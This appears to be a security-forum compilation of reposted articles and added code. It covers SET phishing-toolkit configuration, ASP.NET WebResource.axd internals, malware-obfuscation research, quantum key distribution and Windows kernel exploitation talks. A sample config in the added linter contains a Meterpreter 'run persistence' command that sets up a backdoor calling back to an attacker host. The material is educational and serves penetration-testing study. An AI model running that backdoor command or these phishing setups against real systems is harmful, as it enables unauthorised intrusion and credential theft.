# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
SELF_SIGNED_CERT=OFF
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem

If you are targeting a website that uses the “HTTPS” protocol for communication, it’s better to make your website use “HTTPS” too. Fortunately, SET allows you to incorporate SSL based attacks with it, so you will need to turn webattack_ssl to ON, set the second option to ON if you want to use self-signed certificates, and point the third and fourth options to the location of the client and server certificates.

Conclusion

The Social Engineering Toolkit is a powerful tool that the penetration tester can use against his victims to convince them to provide him with the information required for further attacks. SET has many features that you can customize to help you with your attack scenario.

References

www.wikipedia.com
www.social-engineer.org

Sursa: InfoSec Institute Resources – Phishing and Social Engineering Techniques 2.0
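The options walked through in the article above are plain `KEY=VALUE` lines with `#` comments, and several of them only make sense in combination: DSNIFF=ON disables Ettercap, WEBATTACK_SSL=ON needs PEM paths unless SELF_SIGNED_CERT=ON, APACHE_SERVER=ON needs APACHE_DIRECTORY, and the MULTI_COMMANDS strings are `;`-separated. The following is an added example, not from the article and not part of SET: a small Python linter that parses a set_config fragment and reports those inconsistencies before an engagement starts. The sample configuration is constructed for the demo (it deliberately enables both sniffers and leaves PEM_SERVER empty); the option names and the rules come from the descriptions above, and the linter makes no claim about how SET itself resolves any other conflict.

```python
# Constructed sample in set_config's KEY=VALUE format; values chosen to trip two checks.
SAMPLE_CONFIG = """\
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit/msf3
METASPLOIT_DATABASE=postgresql
ENCOUNT=4
AUTO_MIGRATE=OFF
METERPRETER_MULTI_SCRIPT=ON
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
METASPLOIT_IFRAME_PORT=8080
ETTERCAP=ON
ETTERCAP_PATH=/usr/share/ettercap
ETTERCAP_INTERFACE=eth0
DSNIFF=ON
SENDMAIL=OFF
APACHE_SERVER=OFF
WEBATTACK_SSL=ON
SELF_SIGNED_CERT=OFF
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=
"""

# Options the article describes as ON/OFF switches.
FLAGS = {
    "AUTO_MIGRATE", "BACKDOOR_EXECUTION", "METERPRETER_MULTI_SCRIPT",
    "LINUX_METERPRETER_MULTI_SCRIPT", "ETTERCAP", "DSNIFF", "SENDMAIL",
    "SELF_SIGNED_APPLET", "APACHE_SERVER", "WEBATTACK_SSL", "SELF_SIGNED_CERT",
}


def parse_set_config(text):
    """Parse KEY=VALUE lines; lines starting with '#' are comments. A repeated key overrides."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            cfg[key.strip()] = value.strip()
    return cfg


def split_multi_commands(value):
    """The *_MULTI_COMMANDS options hold ';'-separated Meterpreter commands."""
    return [cmd.strip() for cmd in value.split(";") if cmd.strip()]


def lint_set_config(cfg):
    """Return a list of human-readable findings; an empty list means the fragment is consistent."""
    findings = []
    for key in sorted(FLAGS.intersection(cfg)):
        if cfg[key] not in ("ON", "OFF"):
            findings.append(f"{key}: expected ON or OFF, got {cfg[key]!r}")
    if not cfg.get("ENCOUNT", "4").isdigit():
        findings.append("ENCOUNT: must be a non-negative integer")
    port = cfg.get("METASPLOIT_IFRAME_PORT", "8080")
    if not (port.isdigit() and 1 <= int(port) <= 65535):
        findings.append(f"METASPLOIT_IFRAME_PORT: {port!r} is not a valid TCP port")
    if cfg.get("DSNIFF") == "ON" and cfg.get("ETTERCAP") == "ON":
        findings.append("DSNIFF=ON disables Ettercap, so ETTERCAP=ON will be ignored")
    if cfg.get("WEBATTACK_SSL") == "ON" and cfg.get("SELF_SIGNED_CERT") != "ON":
        for pem in ("PEM_CLIENT", "PEM_SERVER"):
            if not cfg.get(pem):
                findings.append(f"WEBATTACK_SSL=ON needs {pem} set (or SELF_SIGNED_CERT=ON)")
    if cfg.get("APACHE_SERVER") == "ON" and not cfg.get("APACHE_DIRECTORY"):
        findings.append("APACHE_SERVER=ON needs APACHE_DIRECTORY")
    for prefix in ("", "LINUX_"):
        if cfg.get(prefix + "METERPRETER_MULTI_SCRIPT") == "ON" and \
                not split_multi_commands(cfg.get(prefix + "METERPRETER_MULTI_COMMANDS", "")):
            findings.append(f"{prefix}METERPRETER_MULTI_SCRIPT=ON but no {prefix}METERPRETER_MULTI_COMMANDS")
    return findings


if __name__ == "__main__":
    for finding in lint_set_config(parse_set_config(SAMPLE_CONFIG)):
        print("[!]", finding)
```

Run against the sample it reports the Ettercap/dsniff clash and the empty PEM_SERVER; fixing those two values yields an empty finding list. The same parser can be pointed at the real set_config file after `svn update`, which is also a cheap way to spot options the update renamed or removed.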
  10. The ASP.NET Internals

Dejan Lukan
May 23, 2013

ASP.NET Configuration Options

The most important configurations in the web.config file will be described in this section:

<authentication>

The authentication tag is used at the application level and is used to identify the client. There are four authentication modes we can choose from when setting this element: None, Windows, Forms, Passport. If we don’t need any authentication, we can simply set the authentication mode to None. We can also use the Windows authentication mode if we would like IIS to handle the authentication for us; in a usual scenario, the authentication credentials are sent to the IIS server, whose job is to check their validity and respond appropriately. IIS gives us four standard authentication options that we can use: Anonymous, Basic, Digest and Windows integrated. Forms authentication uses web application forms to collect the user-supplied username and password and validate them. With Passport authentication, we’re actually authenticating against Microsoft’s Passport database, which is good because users don’t need to constantly re-register on various sites, but it costs a bit of money to use. Let’s take a look at the authentication tag as used by the default application, which can be created by Visual Studio:

<authentication mode="Forms">
  <forms loginUrl="~/Account/Login.aspx" timeout="2880" />
</authentication>

We can see that we need to log in with the Forms authentication mode if we’re trying to access the Account/Login.aspx page. This can be seen in the picture below, where we can clearly see that we need to input the right username and password to successfully authenticate:

<authorization>

The next important field is <authorization>, which controls the clients’ access to the resources in the same directory. Inside this element, we can use either <allow> or <deny> elements, where both of them can be used to allow/deny access to users and resources. We can use different attributes with those two elements to give/deny the exact group of users certain permissions. The attributes are the following:

- users: we can use a list of user names which we allow/deny access to certain resources, but there are also two other characters that have a special meaning. The ? character can be used to specify anonymous users, while all users are specified with the * character.
- roles: we can specify a list of roles which are allowed/denied access to a certain resource.
- verbs: we can specify a list of HTTP methods to which the access is allowed/denied.

Let’s take a look at the default Visual Studio application’s Account/ directory, which contains the following web.config configuration file:

<?xml version="1.0"?>
<configuration>
  <location path="Register.aspx">
    <system.web>
      <authorization>
        <allow users="*"/>
      </authorization>
    </system.web>
  </location>
  <system.web>
    <authorization>
      <deny users="?"/>
    </authorization>
  </system.web>
</configuration>

In the above configuration, we’re specifying that all users are allowed access to the Register.aspx resource, while by default anonymous users are not allowed to access anything else.

<compilation>

The compilation element is used to define the compiler settings. There are a number of attributes that we can use with the compilation element, but the following are the most useful:

- debug: specifies if the debugging information should be printed to the web browser.
- defaultLanguage: specifies which language the application was written in.
- targetFramework: specifies the ASP.NET target framework which is used to compile the application.

Let’s take a look at the default Visual Studio application that contains the following <compilation> settings:

<compilation debug="true" targetFramework="4.0" />

We’ve asked the application to print debugging information and told it that it was compiled for the 4.0 ASP.NET target framework.
We can also see this information in the project’s properties under the Application > Target framework setting. ScriptResource and WebResource From Microsoft ASP.NET 2.0, we can embed static files, like html files, css files, image files and scripts in assembly as .resources. But then we need a handle to access those resources, which is exactly what the WebResource.axd provides. This is why the WebResource.axd file is used to retrieve assembly resources and send them as a response to the request in a web browser. When we send a request to the WebResource.axd, the handler will look up the web resource identifier and try to load the assembly that contains the resource. If successful, it will get the data from the .resource assembly and send it to the client. The URL for WebResource.axd looks like this: WebResource.axd?d=<encrypted_id>&t=<time_stamp> The d parameter is used as an ID to request the resource we want, while the t parameter is the time stamp that is used to check whether the resource has changed from when it was last requested. The question arises: why would we even want to use WebResource.axd, when we can simply serve static files normally? The answer is that we can deploy web applications easier and faster because we need to deploy a smaller number of files, not to mention that we need to maintain them. Let’s take a look at the current default Visual Studio application’s files as they appear in the Solution Explorer; this can be seen on the picture below: We can see that we’re using a number of static files like jquery.js files, as well as the Site.css style sheet. To use WebResources.axd instead, we need to create a new directory called Resources/ at the document root of the web application (actually we can name the folder anything we want, but let’s just name it Resources as advised). Right click on the project and select Add New Folder and name the folder Resources. 
The project tree will now look like the one presented in the picture below: Notice that the Resources folder has been added to the list. After that, we need to add some static files to the Resources directory. We can do that by simply dragging and dropping; we’ll drag each jquery.js script as well as the Site.css file to the newly created Resources directory. After that, the Scripts and Styles directories are not needed anymore and we can delete them. The new project tree structure now looks like this: If we try to reload the web page now, it shouldn’t load correctly, since we moved the CSS style sheet file. In the picture below, we can see that this is indeed true, because the CSS style sheet wasn’t read by the website, since it’s not available in the previous location anymore: If we look at the source code of the web page, we can see that it’s trying to access the Styles/Site.css CSS file, but obviously it can’t, since the web page doesn’t have any style applied to it. But let’s nevertheless try to access that file to check whether it’s available or not. In the picture below, we can clearly see that the Site.css file is unreachable. So we just proved that if we move the Site.css style sheet file to some other directory, the application won’t find it and the web page will not be able to load it; this isn’t exactly something new or hard to understand, but we’re doing it because we want to make a point: if we remove the Site.css now, the site won’t be able to use it, but we’ll later add it back by using WebResource.axd, and that’s when the site should look like it did at the beginning, with the style sheet applied. So the first thing we need to do is to prepare the web resources that we’ve just added to the Resources directory. We need to select all of the files in there and right-click on them, then select Properties. The following window should open: Clearly we can see that the Build Action is the setting we need to change.
Notice at the bottom of the picture where it says that the Build Action option specifies how the file should be built and deployed. Currently the field holds a value Content, because each file we selected has this option set; remember that the files are loaded normally now, by linking to them in the HTML as follows: <link href="Styles/Site.css" rel="stylesheet" type="text/css" /> We need to change the Build Action to “Embedded Resource”, as can be seen on the picture below: Next, we need to register the resources as WebResource; we can do that with the WebResource attribute. We can place it in any .cs file, but it wouldn’t be very good if we would have web resources registered in various places. For this reason, it’s best to register all files in the Properties/AssemblyInfo.cs file by using the WebResource attribute. The syntax for registering resources as WebResource in any .cs file is as follows: [assembly: WebResource("webresource_name", "content_type")] The webresource_name is the name of the resource that we’re trying to embed in the assembly. The content_type is the MIME type of the resource. First we need to put the following line on the top of the AssemblyInfo.cs to enable the use of the WebResource: using System.Web.UI; After that, we can register the resources normally with the WebResource. 
To register all previously moved static files we can write something like the following code and add it at the end of the AssemblyInfo.cs file:

    /*
     * Web Resources
     */
    [assembly: WebResource("WebApplication1.Resources.Site.css", "text/css")]
    [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1-vsdoc.js", "text/javascript")]
    [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.js", "text/javascript")]
    [assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.min.js", "text/javascript")]

Notice that the name of each resource is composed of the project name, WebApplication1, followed by the folder name Resources where the files are located, followed by the actual file name of each resource. The second argument is the MIME type of each resource, which is sent as the Content-Type HTTP header in the response and may be used by the web browser in various ways. We used the “text/css” MIME type for the style sheet, while the JavaScript files use the “text/javascript” MIME type.

We’ve just registered our added resources as web resources, but we still have to get the URL of each resource to be able to access them. We already said that before, the web page used the following code to request the resource, which is then downloaded and applied to the web page:

    <link href="Styles/Site.css" rel="stylesheet" type="text/css" />

This wouldn’t work now, however, since the resources have been relocated to another directory and are not defined as Content anymore, but as an Embedded Resource. This is why we need to access them differently, through the WebResource.axd handler, which accepts the d parameter: the ID of the resource we would like to access. But how do we get the value of the d parameter, which is needed to access the resource? This can be done by calling the GetWebResourceUrl method, which accepts two arguments: the type of the server-side resource and the resource name.
To use this method, we must first get an instance of the ClientScriptManager class to which the method belongs. We can put that in the Default.aspx.cs file, which can then look like this:

    using System;
    using System.Diagnostics;
    using System.Reflection;
    using System.Web.UI;
    using System.Web.UI.HtmlControls;

    namespace WebApplication1
    {
        public partial class _Default : System.Web.UI.Page
        {
            // Wired up automatically by AutoEventWireup="true" in Default.aspx
            void Page_Init(object sender, EventArgs e)
            {
                ClientScriptManager cs = Page.ClientScript;

                // Ask the ClientScriptManager for the WebResource.axd URL (including its d=
                // parameter) of the embedded style sheet and emit it as a <link> in the header.
                HtmlLink myHtmlLink = new HtmlLink();
                myHtmlLink.Href = cs.GetWebResourceUrl(typeof(SiteMaster), "WebApplication1.Resources.Site.css");
                // RegisterClientScriptResource emits a <script src="WebResource.axd?d=..."> include;
                // it is the call to use for the embedded .js files and is not needed for the style sheet.
                cs.RegisterClientScriptResource(typeof(SiteMaster), "WebApplication1.Resources.Site.css");
                myHtmlLink.Attributes.Add("rel", "stylesheet");
                Page.Header.Controls.Add(myHtmlLink);

                // Debug aid: list every manifest resource compiled into the assembly, so the
                // names used above can be checked against what is really embedded.
                string[] resourceNames = Assembly.GetExecutingAssembly().GetManifestResourceNames();
                foreach (string res in resourceNames)
                {
                    Debug.WriteLine("Resource name: " + res);
                }
            }
        }
    }

We loaded the “WebApplication1.Resources.Site.css” CSS resource and added it to the header of the web page. At the end of the method, we’re also printing all the embedded resources to verify that they were compiled in successfully. If we run the application now, we should see that the CSS file is indeed loaded and working.

We’ve just used WebResource.axd to get access to our CSS resource file; we won’t repeat the steps for the JavaScript files, because they are essentially the same. If there are any problems loading the resource files, we can download Reflector, accessible here: .NET Reflector - Understand and debug any .NET code, and look inside the generated DLL files located in the bin/ directory of the application. .NET Reflector looks like the picture below. If we look at WebApplication1, we can clearly see that the path to the resources is correct, as can also be seen on the picture below.

If the resources are still not loaded correctly, there’s a nice tip here: asp.net - WebResource Hell - resource cannot be found - Stack Overflow. It suggests that we should call the GetWebResourceUrl method with the type of our .master file.
In our case, the master file contains the class SiteMaster, which we should use as the first parameter to the GetWebResourceUrl method. After that, everything should work just fine. Let’s verify that the CSS file has indeed been loaded successfully. On the picture below we can see that we’ve accessed the CSS file through WebResource.axd and that the CSS is actually visible and being read correctly.

We can see that we can successfully get our hands on the resources by using WebResource.axd, which is located at the document root according to the URIs in the source of the web page. However, there isn’t actually a WebResource.axd file in the document root of the application; this is because .axd files are implemented as HTTP handlers, so they don’t exist as an ASP.NET web page. If we look at the web.config configuration file in the C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\Config directory, we can see the following, which directly relates to our WebResource.axd handler:

    <add path="WebResource.axd" verb="GET" type="System.Web.Handlers.AssemblyResourceLoader" validate="True" />

If a request comes in for WebResource.axd, the AssemblyResourceLoader HTTP handler is used to handle it. This fully explains that the WebResource.axd file is just an HTTP handler implemented by the .NET framework to take requests and return the resources from the compiled assemblies.

Conclusion

We’ve seen how we can embed static files inside the compiled assembly, which enabled us to have every static resource available in a single file. This was a more complete introduction to WebResource.axd and ASP.NET, and it is the basis for understanding the Padding Oracle attack.

Source: InfoSec Institute Resources – The ASP.NET Internals
11. Advanced Cryptography

Description: In this video Bill Buchanan talks about Advanced Cryptography, covering topics such as the fundamentals of crypto, encryption, private keys, passing keys, public keys, private keys for identity, PKI, hashing, one-time passwords, MACs, secure functions, etc. He covers almost all popular encryption methods.

Download code, PDF & tools: http://www.asecuritysite.com/Encryption

Source: Advanced Cryptography
12. Dynamic Malware Analysis

Description: In this video you will learn how to perform dynamic malware analysis using the OllyDbg tool. Dynamic malware analysis is a very risky task because you are running the piece of malware on your system and checking what exactly it does, and afterwards you analyze the processes and connections for evidence or other use. In this video he is running a Zeus botnet.

Source: Dynamic Malware Analysis
13. Mimimorphism: A New Approach to Binary Code Obfuscation

Zhenyu Wu, Steven Gianvecchio, Mengjun Xie, and Haining Wang

Abstract

Binary obfuscation plays an essential role in evading malware static analysis and detection. The widely used code obfuscation techniques, such as polymorphism and metamorphism, focus on evading syntax-based detection. However, statistical test and semantic analysis techniques have been developed to thwart their evasion attempts. More recent binary obfuscation techniques are divided in their purposes of attacking either the statistical or the semantic approach, but not both. In this paper, we introduce mimimorphism, a novel binary obfuscation technique with the potential of evading both statistical and semantic detections. Mimimorphic malware uses instruction-syntax-aware high-order mimic functions to transform its binary into mimicry executables that exhibit high similarity to benign programs in terms of statistical properties and semantic characteristics. We implement a prototype of the mimimorphic engine on the Intel x86 platform, and evaluate its capability of evading statistical anomaly detection and semantic analysis detection techniques. Our experimental results demonstrate that the mimicry executables are indistinguishable from benign programs in terms of byte frequency distribution and entropy, as well as control flow fingerprint.

Full paper (387 KB) appeared in Proceedings of the 17th ACM Conference on Computer and Communications Security (CCS'10).
http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/Mimimorphic.pdf

Download presentation slides (for PowerPoint 2007+, 1.12 MB)
http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/ZhenyuWu_CCS2010_Mimimorphism.pptx

Experimental data

7th order 100 mimimorphic instances (bz2 tar package, 127 MB)
http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder7.tar.bz2

8th order 100 mimimorphic instances (bz2 tar package, 169 MB)
http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder8.tar.bz2

Note: These mimimorphic instances are NOT standalone executables. They are the mimimorphic payloads, which consist of sequences of mimicry instructions that encode a piece of randomized data. In a standalone mimimorphic executable, if we were to make one, each piece of payload would be merged with the decoder binary and put into the ".text" section of the executable.

Maintained by: Zhenyu Wu
Last modified: Mon Apr 30 18:16:22 EDT 2012

Source: Mimimorphism: A New Approach to Binary Code Obfuscation
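The abstract above says a mimicry executable has to match benign programs on byte frequency distribution and entropy. The following added example (written for this page, not the paper's code) computes exactly those two features and a crude threshold detector over constructed byte samples, so the reader can see what such a statistical detector measures and why a payload drawn from the benign byte distribution passes it while a packed or encrypted blob does not. The byte alphabet, thresholds and sample sizes are assumptions for illustration, not a real opcode distribution.

```python
"""Byte-histogram and Shannon-entropy features of the kind a statistical
detector uses, plus a naive detector built on them. Added example; the byte
samples below are constructed, not real binaries."""
import math
import random
from collections import Counter


def byte_histogram(data: bytes) -> list:
    """Normalized frequency of each of the 256 byte values (sums to 1.0)."""
    n = len(data)
    if n == 0:
        return [0.0] * 256
    counts = Counter(data)
    return [counts.get(b, 0) / n for b in range(256)]


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    return -sum(p * math.log2(p) for p in byte_histogram(data) if p > 0.0)


def histogram_distance(a: bytes, b: bytes) -> float:
    """L1 distance between two byte histograms: 0.0 (identical) .. 2.0 (disjoint)."""
    return sum(abs(x - y) for x, y in zip(byte_histogram(a), byte_histogram(b)))


def flagged_as_anomalous(sample: bytes, benign_ref: bytes,
                         entropy_slack: float = 0.5, hist_max: float = 0.6) -> bool:
    """Naive statistical detector: flag the sample if its entropy or its histogram
    is far from a benign reference. Thresholds are illustrative assumptions."""
    if abs(shannon_entropy(sample) - shannon_entropy(benign_ref)) > entropy_slack:
        return True
    return histogram_distance(sample, benign_ref) > hist_max


def constructed_sample(seed: int, alphabet: bytes, n: int = 4096) -> bytes:
    """Deterministic constructed data drawn (with replacement) from `alphabet`."""
    rng = random.Random(seed)
    return bytes(rng.choice(alphabet) for _ in range(n))


# Constructed stand-in for benign x86 code: a small, skewed alphabet of byte values
# (loosely modelled on common opcode/prefix/immediate bytes; not a real distribution).
CODE_ALPHABET = bytes([0x8b, 0x89, 0x55, 0x8b, 0xec, 0x83, 0xc4, 0x00, 0x00, 0x00,
                       0xe8, 0xff, 0xff, 0x5d, 0xc3, 0x90, 0x74, 0x75, 0x0f, 0x48])
BENIGN = constructed_sample(1, CODE_ALPHABET)
# Constructed stand-in for a packed/encrypted payload: bytes uniform over 0..255.
PACKED = constructed_sample(2, bytes(range(256)))
# A "mimicry" payload drawn from the same alphabet as the benign reference: different
# random content, same statistics, so the detector lets it through.
MIMIC = constructed_sample(3, CODE_ALPHABET)


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("packed", PACKED), ("mimic", MIMIC)):
        print(f"{name:7s} entropy={shannon_entropy(blob):.3f} "
              f"hist_dist={histogram_distance(blob, BENIGN):.3f} "
              f"flagged={flagged_as_anomalous(blob, BENIGN)}")
```

Run it as a script to print the three feature rows; the point of the MIMIC row is that a detector keyed only on these two features cannot separate it from the reference, which is the gap the paper's control-flow-fingerprint evaluation addresses separately.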
14. [h=2]Cryptography[/h]
[h=3]The solace of quantum[/h]
[h=1]Eavesdropping on secret communications is about to get harder[/h]
May 25th 2013

CRYPTOGRAPHY is an arms race between Alice and Bob, and Eve. These are the names cryptographers give to two people who are trying to communicate privily, and to a third who is trying to intercept and decrypt their conversation. Currently, Alice and Bob are ahead—just. But Eve is catching up. Alice and Bob are therefore looking for a whole new way of keeping things secret. And they may soon have one, courtesy of quantum mechanics.

At the moment cryptography concentrates on making the decrypting part as hard as possible. The industry standard, known as RSA (after its inventors, Ron Rivest, Adi Shamir and Leonard Adleman, of the Massachusetts Institute of Technology), relies on two keys, one public and one private. These keys are very big numbers, each of which is derived from the product of the same two prime numbers. Anyone can encrypt a message using the public key, but only someone with the private key can decrypt it. To find the private key, you have to work out what the primes are from the public key. Make the primes big enough—and hunting big primes is something of a sport among mathematicians—and the task of factorising the public key to reveal the primes, though possible in theory, would take too long in practice. (About 40 quadrillion years with the primes then available, when the system was introduced in 1977.) Since the 1970s, though, the computers that do the factorisation have got bigger and faster. Some cryptographers therefore fear for the future of RSA. Hence the interest in quantum cryptography.

Alice, Bob and Werner, too?

The most developed form of quantum cryptography, known as quantum key distribution (QKD), relies on stopping interception, rather than preventing decryption. Once again, the key is a huge number—one with hundreds of digits, if expressed in the decimal system.
Alice sends this to Bob as a series of photons (the particles of light) before she sends the encrypted message. For Eve to read this transmission, and thus obtain the key, she must destroy some photons. Since Bob will certainly notice the missing photons, Eve will need to create and send identical ones to Bob to avoid detection. But Alice and Bob (or, rather, the engineers who make their equipment) can stop that by using two different quantum properties, such as the polarities of the photons, to encode the ones and zeros of which the key is composed. According to Werner Heisenberg’s Uncertainty Principle, only one of these two properties can be measured, so Eve cannot reconstruct each photon without making errors. If Bob detects such errors he can tell Alice not to send the actual message until the line has been secured.

One exponent of this approach is ID Quantique, a Swiss firm. In collaboration with Battelle, an American one, it is building a 700km (440-mile) fibre-optic QKD link between Battelle’s headquarters in Columbus, Ohio, and the firm’s facilities in and around Washington, DC. Battelle will use this to protect its own information and the link will also be hired to other firms that want to move sensitive data around.

QuintessenceLabs, an Australian firm, has a different approach to encoding. Instead of tinkering with photons’ polarities, it changes their phases and amplitudes. The effect is the same, though: Eve will necessarily give herself away if she eavesdrops. Using this technology, QuintessenceLabs is building a 560km QKD link between the Jet Propulsion Laboratory in Pasadena, California, which organises many of NASA’s unmanned scientific missions, and the Ames Research Centre in Silicon Valley, where a lot of the agency’s scientific investigations are carried out.
A third project, organised by Jane Nordholt of Los Alamos National Laboratory, has just demonstrated how a pocket-sized QKD transmitter called the QKarD can secure signals sent over public data networks to control smart electricity grids. Smart grids balance demand and supply so that electricity can be distributed more efficiently. This requires constant monitoring of the voltage, current and frequency of the grid in lots of different places—and the rapid transmission of the results to control centres. That transmission, however, also needs to be secure in case someone malicious wants to bring the system down.

In their different ways, all these projects are ambitious. All, though, rely on local fixed lines to carry the photons. Other groups of researchers are thinking more globally. To do that means sending quantum-secured data to and from satellites. At least three groups are working on this: Thomas Jennewein and his team at the Institute for Quantum Computing in Waterloo, Canada; a collaboration led by Anton Zeilinger at the University of Vienna and Jian-Wei Pan at the University of Science and Technology of China; and Alex Ling and Artur Ekert at the Centre for Quantum Technologies in Singapore.

Dr Jennewein’s proposal is for Alice to beam polarisation-encoded photons to a satellite. Once she has established a key, Bob, on another continent, will wait until the satellite passes over him so he can send some more photons to it to create a second key. The satellite will then mix the keys together and transmit the result to Bob, who can work out the first key because he has the second. Alice and Bob now possess a shared key, so they can communicate securely by normal (less intellectually exhausting) terrestrial networks. Dr Jennewein plans to test the idea, using an aircraft rather than a satellite, at some point during the next 12 months.

An alternative, but more involved, satellite method is to use entangled photon pairs.
Both Dr Zeilinger’s and Dr Ling’s teams have been trying this. Entanglement is a quantum effect that connects photons intimately, even when they are separated by a large distance. Measure one particle and you know the state of its partner. In this way Alice and Bob can share a key made of entangled photon pairs generated on a satellite. Dr Zeilinger hopes to try this with a QKD transmitter based on the International Space Station. He and his team have been experimenting with entanglement at ground level for several years. In 2007 they sent entangled photon pairs 144km through the air across the Canary Islands. Dr Ling’s device will test entanglement in orbit, but not send photons down to Earth.

If this sort of thing works at scale, it should keep Alice and Bob ahead for years. As for poor Eve, she will find herself entangled in an unbreakable quantum web.

Source: Cryptography: The solace of quantum | The Economist
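The intercept-and-resend argument in the article (Eve must measure each photon, and measuring in the wrong basis disturbs it) is the BB84 protocol. Below is an added example, a classical simulation written for this page rather than any vendor's code, that runs the exchange with and without an eavesdropper and reports the error rate Bob sees on the sifted key: zero on an untapped line, about 25% when Eve measures and resends every photon. The 11% abort threshold and photon count are assumptions for illustration; real QKD systems add error correction and privacy amplification, which the simulation leaves out.

```python
"""Classical simulation of BB84 quantum key distribution with an optional
intercept-and-resend eavesdropper. Added example for this page; it models
polarization measurement outcomes with coin flips, not real photons."""
import random

RECTILINEAR, DIAGONAL = 0, 1   # the two polarization bases (+ and x)


def measure(photon, basis, rng):
    """Measure a (bit, basis) photon. Same basis: the exact bit. Other basis: a
    random outcome, and the photon is now in the measuring basis (state disturbed)."""
    bit, prepared_basis = photon
    if prepared_basis == basis:
        return bit
    return rng.getrandbits(1)


def run_bb84(n_photons, eavesdrop, seed):
    """Run one BB84 exchange; return sifted-key length, error count and QBER."""
    rng = random.Random(seed)
    alice_bits = [rng.getrandbits(1) for _ in range(n_photons)]
    alice_bases = [rng.getrandbits(1) for _ in range(n_photons)]
    bob_bases = [rng.getrandbits(1) for _ in range(n_photons)]
    photons = list(zip(alice_bits, alice_bases))   # what leaves Alice

    if eavesdrop:
        # Eve cannot copy a photon. She must guess a basis, measure, and send Bob a
        # fresh photon prepared in her basis with the value she observed.
        resent = []
        for ph in photons:
            eve_basis = rng.getrandbits(1)
            resent.append((measure(ph, eve_basis, rng), eve_basis))
        photons = resent

    bob_bits = [measure(ph, b, rng) for ph, b in zip(photons, bob_bases)]

    # Sifting: over the public channel Alice and Bob announce bases (never bits) and
    # keep only the positions where they happened to choose the same basis.
    sifted = [(a, b) for a, b, ab, bb in zip(alice_bits, bob_bits, alice_bases, bob_bases)
              if ab == bb]
    errors = sum(1 for a, b in sifted if a != b)
    qber = errors / len(sifted) if sifted else 0.0
    return {"sifted": len(sifted), "errors": errors, "qber": qber}


def key_accepted(result, max_qber=0.11):
    """Alice and Bob compare a sample of sifted bits (here: all of them) and abort if
    the error rate is too high. 0.11 is an assumed threshold for this example."""
    return result["qber"] <= max_qber


if __name__ == "__main__":
    quiet = run_bb84(4000, eavesdrop=False, seed=7)
    tapped = run_bb84(4000, eavesdrop=True, seed=7)
    print("no Eve  :", quiet, "accepted:", key_accepted(quiet))
    print("with Eve:", tapped, "accepted:", key_accepted(tapped))
```

The 25% figure follows directly from the coin flips: Eve guesses the wrong basis half the time, and in those cases Bob (who did match Alice) reads a random value, so half of those are wrong.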
15. [h=2]NoSuchCon’13 and crashing Windows with two instructions[/h]

The first edition of the NoSuchCon security conference held in Paris ended just a few days ago. Before anything else, I would like to thank all of the organizers (proudly listed at nosuchcon.org) for making the event such a blast! The location, venue and speaker line-up were all amazing, with lots of free beer and a wealth of people to chat with. Overall, I am very happy to have shown up there and I will definitely make sure to attend the second edition of the conference.

Other than drinking, discussing 0-days and visiting Paris, I also had the pleasure to give a talk about the usual subject – Windows kernel security. The exact title of my presentation was “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions“, and it touched on several different exploitation techniques, internal CPU-related behavior and security vulnerabilities (all related to the Windows operating system) that I discovered during the course of the last several weeks / months. While the slide deck was made available to the attendees right at the beginning of my talk at nosuchcon.org/talks (great idea!), I’m reposting it here anyway, in case you haven’t had a chance to take a look yet. In fact, a majority of the talks were interesting and highly technical, so be sure to check the available material for all presentations ;-)

Download Slides: “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions” (3.3MB, PDF)
KiTrap0e advisory: “Abusing Windows NT #PF Trap Handler to Bugcheck and Leak Information”

I originally planned to address six separate topics, but due to time constraints I decided to skip some of them in favor of the other ones. A brief description of each technique and vulnerability follows below.
“nt!memcpy (and the like) reverse copying order” – certain implementations of memcpy, memmove, RtlCopyMemory and RtlMoveMemory found in the kernel and third-party drivers alike handle the “overlapping regions” corner case by reversing the copy order from the intuitive left-to-right to right-to-left direction. By starting to write at the end of the destination memory region, the functions facilitate successful exploitation of certain buffer overflow vulnerabilities, by allowing a (relative) write-what-where condition to be provoked. While the technique works best for a kernel-to-user copy on 64-bit platforms, it can also be applied to a number of other scenarios. For more information, please refer to the “Memory Copy Functions in Local Windows Kernel Exploitation” article published last year in the Hack in the Box Magazine, Issue 009. The Proof of Concept source code of a vulnerable device driver and an exploit used during the live demonstration can be found at memcpy_ioctl.zip (3.9kB, ZIP). Note that the code has only been confirmed to be susceptible to a stack cookie bypass when built with WDK 7600.16385.1 for Windows 7 (x64 Free Build), although it should generally work for any 64-bit target.

“nt!memcmp double-fetch” – an interesting behavior found in the Windows 8 32-bit implementation of the nt!memcmp standard function, making it possible to fake matching regions when a user-mode pointer is passed as one of the function’s parameters. Due to lack of time, this was not covered at NSC; however, our SyScan’13 slides and paper explain the problem thoroughly.

“PAGE_GUARD and kernel code execution flow” – a technique already described in the “Fun facts: Windows kernel and guard pages” and “A story of win32k!cCapString, or unicode strings gone bad.” blog posts.
